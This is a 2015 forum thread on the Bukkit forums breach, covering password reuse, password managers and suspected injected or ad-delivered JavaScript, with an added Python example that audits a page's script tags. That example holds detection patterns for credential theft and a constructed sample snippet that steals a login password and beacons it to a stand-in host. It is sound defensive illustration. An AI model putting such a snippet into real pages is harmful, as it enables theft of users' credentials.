Forum Security Advisory

Discussion in 'Bukkit News' started by Kaelten, Dec 7, 2015.

  1. This is why I recommend password managers like LastPass.
    I don't trust other people with my passwords.
    mbaxter ʇıʞʞnq ɐ sɐɥ ı

    Keepass then?
    @mbaxter, i downloaded keepass yesterday ironically.

    EDIT: Just a note. If you share your Bukkit forum password and Bukkit Dev password as I know a lot of people probably do, you know the drill.

    @Kaelten, you may want to extend the breach announcement to Bukkit Dev as I can assure you most users share the same password between them.
    Curse, cursed it.
  6. Jesus! I only had a few Bukkit programming questions and now everything got hacked....
    I now use another password, but can I use it for other things, or is this website still hacked?
    Dear God, why did I use the same password on nearly every forum...
    Good that I am too young to own any account affiliated with money.
    This is really sad, especially that they are using them everywhere.
    Lucky me that my Google account, for example, has a different password.
    Instantly changed my password, everywhere.
    I just wanted to check the time in the night and saw the most horrifying e-mail I've ever seen... :(
    But that moment...
    And let's look on my tablet.
    New e-mail.
    From Bukkit.
    Is it that guy again asking something because my plugin doesn't work for him?
    Looking at the e-mail.
    Dear Bukkit user, basically, you are FUC#-D.
    Now I have to remember where I used this password....
    And once again it falls down to EVERYBODY to mop up the shortcomings of so-called Admin.
    This is ridiculous.

    Can someone help me? Do I need to change all passwords on any account?

    timtower Administrator Moderator

    Where you used the password from Bukkit: yes.
    Other accounts: Changing it on a regular basis is wise anyway.
    My Amazon account (on my secondary email, not the Bukkit one) was compromised and I received an email yesterday. Apparently the password to my email was posted online... Is this anything related to this? It was a different email... just such a coincidence.
    timtower Administrator Moderator

    I don't know if it is related.
    Well, just to get to work then.
    Does anyone know who hacked? I am assuming it is Valkyrie on twitter, due to the picture on the first page
    I received the email telling me I may have been compromised but nothing came from it fortunately. This is the only site I use the specific password on so it wouldn't have done much good aside from posting negative stuff on the forums themselves if they did compromise my Bukkit forum account. I was able to log in to change it easily and updated it to a safer one just to prevent anything silly from happening. I would suggest setting all your accounts that offer the feature to text confirmation before password change is available. Most if not all credible email hosts are offering this feature now. It doesn't get much safer than needing the phone in your own hand to gain access to an account and can save you a lot of trouble. I thank the staff here on the forums though for alerting me of this so I could change it in time!

    Good luck to all affected and I hope all gets sorted out soon.
    Would be a good time to implement Two-Factor Authentication. Preferably U2F.
    timtower Administrator Moderator

    Is that hardware only?


    I can almost assure you it isn't a coincidence. Same thing happened to me with my Microsoft account.

    Also, no effort was put forth in proofreading that email. Absolutely none. Zero. And this phrase. "We take your privacy very seriously". This isn't a matter of privacy. This is a matter of security and the most overused phrase ever. Just saying.
    It's funny, I'm studying code injection and this happens!
    On the positive, this might help me remember stuff for my exam tomorrow!
  19. Interesting how fast you can be basically f###ed.
    Luckily nothing has been compromised for me - no Spotify, no Microsoft account (that would be horrible because my PC password is linked to it) etc...
    This should remind all of us that using the same password is the dumbest thing you can ever do - no one can say "oh, I only register at legit websites" (that's how I thought), but this tells everybody:
    You are not safe.
    On the internet nobody can ever be safe. You can only reduce the risk of being hacked, but every service can be hacked, so never use the same password!
    But the nice thing is, almost every website where I've changed my password sent me an email: Your password has been changed; if you did this, ignore it, else click here {link to account recovery}.
    Nice that they're doing this, so if the hackers changed anything I would have found out and could recover my account.
    Funny, I told you that on my tablet malicious scam ads popped up after logging in and clicking a thread, if JavaScript is enabled. It only happened on my tablet, but it only ever happened on this website.
    Nobody believed that Bukkit could be related to that.
    I think that isn't a coincidence - malicious JavaScript opening ads and malicious JavaScript stealing the account's password seem to go well together.

    I don't understand karma here - people cracking Sony Vegas Pro or Bandicam don't run into issues and people derping around at a Bukkit site are hacked.
    TL;DR: the website behaved strangely on my tablet, which doesn't seem like a coincidence; learn to use different passwords and you won't have a problem.

    I guess I was one of the lucky ones that only got a shock and learned something about password reuse.
    The same goes for usernames: never use the same Skype name as your in-game name. Someone who wants to troll you can type your in-game name into a fancy website, get your IP if it is the same username, and then DDoS you.

    Interesting, I didn't get spam, because the hackers have our email address too...
    Did anyone get more spam mails than average?
    timtower Administrator Moderator

    And you say that based on?
    And how is an ad service related to password stealing?
  21. Because no ad is intended to redirect to another website and open scam ads that try to force you to install a virus onto your device.
    I think they have our email address because that is used to log in to the forums?!
    They have our e-mail address, not password. If your password for your e-mail is the same as your Bukkit password, yes, they would have it. That's why it's better to have different passwords for each website, even if it does get confusing.
    Well, an email is required to register a user, and since an administrator can see this information on a user profile, it's not out of the question.

    Well, it depends on how properly or improperly the ads are curated. You can have a malicious ad trying to inject a password-tracking JavaScript, for example. @Tecno_Wizard PMed me a few concerns about tracking scripts from adverts as well, so I wouldn't put that out of the question either until this is investigated in full by Curse. Based on IRC logs they didn't exactly catch everything that the malicious hacker has done.
  24. I have a video of the "ad" popping up.
    I made a thread where you can see it.
    I have re-enabled JavaScript and now the ad is gone.
    When Curse re-enables forum ads we will see if it comes back again - if yes, it is an ad; if not, the hacker created it.
    Ok, I have done a ton of research- being very worried D:

    Here are some ways to make sure about your account being safe.. :

    Then, you will need a password manager. The best one is KeePass (

    After this, you should be fine! Make sure to change all your accounts to separate passwords to ensure this hacker cannot do anything with your breached information!

    -- Extra --
    Can anyone tell us who the hacker was?
    I can confirm what @IlluminatiGaming said about emails. They were sent as part of the JavaScript too.
    I looked at the actual site source this morning and found the injection (historic of course)

    And Illuminati- I looked at the site source and no traces of the hackers are left. You probably have adware in your browser.
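The posts above disagree about whether the rogue behaviour came from an ad network script or from JavaScript injected into the page, and one poster says they found the injection by reading the saved page source. The script below is an added example of how a practitioner would do that check systematically; it is not code from Bukkit, Curse or anyone in this thread. It parses a saved HTML page, lists every external `<script src>` whose host is not on an allowlist, and flags inline scripts that combine several credential-harvesting indicators (reading a password input, hooking form submit, beaconing data out). The allowlist hosts, the sample page and the injected snippet are all constructed for illustration.

```python
"""Audit <script> tags in a saved HTML page against an allowlist of hosts.

Added example, not the forum's or Curse's code. ALLOWED_SCRIPT_HOSTS and
SAMPLE_HTML are constructed for illustration; the injected snippet is a
generic shape, not the actual script from the incident.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: hosts the site operator expects to serve scripts from.
ALLOWED_SCRIPT_HOSTS = {"bukkit.org", "static.bukkit.org", "cdn.example-ads.net"}

# Indicators that, together, suggest an inline script is harvesting credentials.
SUSPICIOUS_INLINE = [
    r"type\s*=\s*['\"]password['\"]",            # reads a password input
    r"\.addEventListener\(\s*['\"]submit['\"]",  # hooks form submission
    r"new\s+Image\(\)\.src\s*=",                 # image-beacon exfiltration
    r"XMLHttpRequest|fetch\(",                   # other ways to ship data out
]


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []   # values of <script src=...>
        self.inline = []     # bodies of <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands <script> content to handle_data as raw text.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def audit_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (kind, detail) findings for scripts worth a closer look."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname  # works for https://, http:// and // URLs
        if host is None:
            continue  # relative path: same-origin, treated as the site's own
        if host.lower() not in allowed_hosts:
            findings.append(("external", src))
    for body in parser.inline:
        hits = [p for p in SUSPICIOUS_INLINE if re.search(p, body)]
        if len(hits) >= 2:  # require more than one indicator to cut noise
            findings.append(("inline", " ".join(body.split())[:80]))
    return findings


# Constructed sample page: one same-origin script, one allowed CDN script,
# one script from an unknown host, one benign inline snippet and one
# inline snippet shaped like a password stealer.
SAMPLE_HTML = """
<html><body>
<script src="/js/forum.js"></script>
<script src="https://static.bukkit.org/xenforo.js"></script>
<script src="//tracker.invalid/t.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<form action="/login"><input type="password" name="pw"></form>
<script>
document.querySelector('form').addEventListener('submit', function () {
  var p = document.querySelector("input[type='password']").value;
  new Image().src = 'https://collect.invalid/?p=' + encodeURIComponent(p);
});
</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in audit_scripts(SAMPLE_HTML):
        print(kind, "->", detail)
```

Run it against a page saved with "view source" rather than one rendered after JavaScript executed; scripts that an ad network adds at runtime only show up in the live DOM, which is why the ad-versus-injection question in this thread is hard to settle from the static source alone.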
    That's nasty. My sincere condolences.
    I am glad I am not the only one caught up in this. How are you all coping with your data being breached?
    Anyone else got that email stating your info may have been taken?
    That PM only contained the adverts. There were a total of 18 tracking scripts on bukkit before the ad ones were killed yesterday and many other scripts not involved in tracking still remain, however that does not mean much as tracking only counts as certain cookie and device fingerprinting behavior in the program I use. That does not count anything else that could potentially be malicious.

    It's fairly likely that they are all benign, but never leave anything to chance.
    I share passwords with my old Google accounts and Bukkit. This explains all the emails I've been getting about new sign-ins from Russia and Kazakhstan...
